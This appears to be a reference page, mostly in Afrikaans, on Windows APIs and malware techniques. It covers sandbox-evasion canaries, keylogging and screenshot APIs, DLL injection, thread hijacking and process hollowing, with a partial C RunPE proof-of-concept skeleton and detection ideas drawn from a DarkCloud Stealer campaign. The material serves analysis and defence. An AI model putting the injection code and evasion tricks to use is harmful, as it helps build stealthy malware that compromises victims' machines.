Algemene API's wat in Malware gebruik word

Reading time: 8 minutes

Generies

Netwerk

TLS pinning and chunked transport

Baie loaders pak hul TCP-stroom in SslStream in en pin die bediener se leaf certificate teen 'n ingeslote kopie (certificate pinning). Bot-inligting/take word gekompresseer (bv. GZip). Wanneer response 'n drempel oorskry (~1 MB), word data in klein stukkies gefragmenteer (bv. 16 KB-segmente) om grootte-gebaseerde heuristieke te vermy en geheuepieke tydens deserialisasie te verminder.

Persistensie

Enkripsie

Anti-Analysis/VM

Emulator API fingerprinting & sleep evasion

Malware often fingerprints sandbox emulators deur te soek na Defender se virtualised exports (gesien in die Malware Protection Emulator). As enige van hierdie simbole teenwoordig is (hoofletter-ongevoelige skandering van die proses), word die uitvoering 10–30 minute vertraag en weer nagegaan om ontledingspogings te verspil.

Voorbeelde van API-name wat as canaries gebruik word:

• MpVmp32Entry, MpVmp32FastEnter, MpCallPreEntryPointCode, MpCallPostEntryPointCode, MpFinalize, MpReportEvent*, MpSwitchToNextThread*
• VFS_* family: VFS_Open, VFS_Read, VFS_MapViewOfFile, VFS_UnmapViewOfFile, VFS_FindFirstFile/FindNextFile, VFS_CopyFile, VFS_DeleteFile, VFS_MoveFile
• ThrdMgr_*: ThrdMgr_GetCurrentThreadHandle, ThrdMgr_SaveTEB, ThrdMgr_SwitchThreads

Tipiese vertragings-primitive (user-land):

cmd /c timeout /t %RANDOM_IN_[600,1800]% > nul

Argument-toegangsbeheer

• Operateurs vereis soms dat 'n onskadelike-voorkomende CLI-skakel teenwoordig is voordat die payload uitgevoer word (bv. /i:--type=renderer om Chromium child processes na te boots). As die skakel afwesig is, sluit die loader onmiddellik, wat naïewe sandbox-uitvoering belemmer.

Stealth

Execution

Miscellaneous

• GetAsyncKeyState() -- Key logging
• SetWindowsHookEx -- Key logging
• GetForeGroundWindow -- Kry naam van die lopende venster (of die webtuiste uit 'n browser)
• LoadLibrary() -- Laai biblioteek
• GetProcAddress() -- Vind prosedureadres
• CreateToolhelp32Snapshot() -- Lys lopende prosesse
• GetDC() -- Skermskoot
• BitBlt() -- Skermskoot
• InternetOpen(), InternetOpenUrl(), InternetReadFile(), InternetWriteFile() -- Toegang tot die Internet
• FindResource(), LoadResource(), LockResource() -- Toegang tot hulpbronne van die uitvoerbare lêer

Malware Techniques

DLL Injection

Execute an arbitrary DLL inside another process

1. Locate the process to inject the malicious DLL: CreateToolhelp32Snapshot, Process32First, Process32Next
2. Open the process: GetModuleHandle, GetProcAddress, OpenProcess
3. Write the path to the DLL inside the process: VirtualAllocEx, WriteProcessMemory
4. Create a thread in the process that will load the malicious DLL: CreateRemoteThread, LoadLibrary

Other functions to use: NTCreateThreadEx, RtlCreateUserThread

Reflective DLL Injection

Load a malicious DLL without calling normal Windows API calls.
The DLL is mapped inside a process, it will resolve the import addresses, fix the relocations and call the DllMain function.

Thread Hijacking

Find a thread from a process and make it load a malicious DLL

1. Find a target thread: CreateToolhelp32Snapshot, Thread32First, Thread32Next
2. Open the thread: OpenThread
3. Suspend the thread: SuspendThread
4. Write the path to the malicious DLL inside the victim process: VirtualAllocEx, WriteProcessMemory
5. Resume the thread loading the library: ResumeThread

PE Injection

Portable Execution Injection: The executable will be written in the memory of the victim process and it will be executed from there.

Process Hollowing (a.k.a RunPE)

Process Hollowing is one of the favourite defence-evasion / execution tricks used by Windows malware. The idea is to launch a legitimate process in the suspended state, remove (hollow) its original image from memory and copy an arbitrary PE in its place. When the primary thread is finally resumed the malicious entry-point executes under the guise of a trusted binary (often signed by Microsoft).

Tipiese werkvloei:

1. Spawn a benign host (e.g. RegAsm.exe, rundll32.exe, msbuild.exe) suspended so that no instructions run yet.

STARTUPINFOA  si = { sizeof(si) };
PROCESS_INFORMATION pi;
CreateProcessA("C:\\Windows\\Microsoft.NET\\Framework32\\v4.0.30319\\RegAsm.exe",
NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);

2. Read the malicious payload into memory and parse its PE headers to obtain SizeOfImage, sections and the new EntryPoint.
3. NtUnmapViewOfSection / ZwUnmapViewOfSection – ontkoppel die oorspronklike image base van die gesuspendeerde proses.
4. VirtualAllocEx – reserveer RWX-geheue van SizeOfImage binne die remote proses.
5. WriteProcessMemory – kopieer eers die Headers, daarna gaan deur die sections en kopieer hul raw data.
6. SetThreadContext – patch die waarde van EAX/RAX (RCX on x64) of Rip in die context-structuur sodat EIP na die payload se EntryPoint wys.
7. ResumeThread – die thread gaan voort en voer die aanvaller-verskafde kode uit.

Minimal proof-of-concept (x86) skeleton:

void RunPE(LPCSTR host, LPVOID payload, DWORD payloadSize){
// 1. create suspended process
STARTUPINFOA si = {sizeof(si)}; PROCESS_INFORMATION pi;
CreateProcessA(host, NULL,NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&si,&pi);

// 2. read remote PEB to get ImageBaseAddress
CONTEXT ctx; ctx.ContextFlags = CONTEXT_FULL;
GetThreadContext(pi.hThread,&ctx);
PVOID baseAddr;
ReadProcessMemory(pi.hProcess,(PVOID)(ctx.Ebx+8),&baseAddr,4,NULL);

// 3. unmap original image & allocate new region at same base
NtUnmapViewOfSection(pi.hProcess,baseAddr);
PVOID newBase = VirtualAllocEx(pi.hProcess,baseAddr,pHdr->OptionalHeader.SizeOfImage,
MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
// 4-5. copy headers & sections …
// 6. write new image base into PEB and set Eip
WriteProcessMemory(pi.hProcess,(PVOID)(ctx.Ebx+8),&baseAddr,4,NULL);
ctx.Eax = (DWORD)(newBase) + pHdr->OptionalHeader.AddressOfEntryPoint;
SetThreadContext(pi.hThread,&ctx);
// 7. run!
ResumeThread(pi.hThread);
}

Praktiese notas waargeneem in die DarkCloud Stealer veldtog:

• The loader picked RegAsm.exe (part of the .NET Framework) as host – a signed binary unlikely to draw attention.
• The decrypted VB6 stealer (holographies.exe) is not dropped on disk; it only ever exists inside the hollowed process making static detection harder.
• Sensitive strings (regexes, paths, Telegram credentials) are RC4-encrypted per-string and only decrypted at runtime, further complicating memory scanning.

Deteksie-idees:

• Alert on CREATE_SUSPENDED processes that never create GUI/console windows before a memory region is allocated as RWX (rare for benign code).
• Look for a call sequence NtUnmapViewOfSection ➜ VirtualAllocEx ➜ WriteProcessMemory across different processes.

Hooking

• The SSDT (System Service Descriptor Table) points to kernel functions (ntoskrnl.exe) or GUI driver (win32k.sys) so user processes can call these functions.
• A rootkit may modify these pointer to addresses that he controls
• IRP (I/O Request Packets) transmit pieces of data from one component to another. Almost everything in the kernel uses IRPs and each device object has its own function table that can be hooked: DKOM (Direct Kernel Object Manipulation)
• The IAT (Import Address Table) is useful to resolve dependencies. It's possible to hook this table in order to hijack the code that will be called.
• EAT (Export Address Table) Hooks. This hooks can be done from userland. The goal is to hook exported functions by DLLs.
• Inline Hooks: This type are difficult to achieve. This involve modifying the code of the functions itself. Maybe by putting a jump at the beginning of this.

Verwysings

• Unit42 – New Infection Chain and ConfuserEx-Based Obfuscation for DarkCloud Stealer
• Check Point Research – Under the Pure Curtain: From RAT to Builder to Coder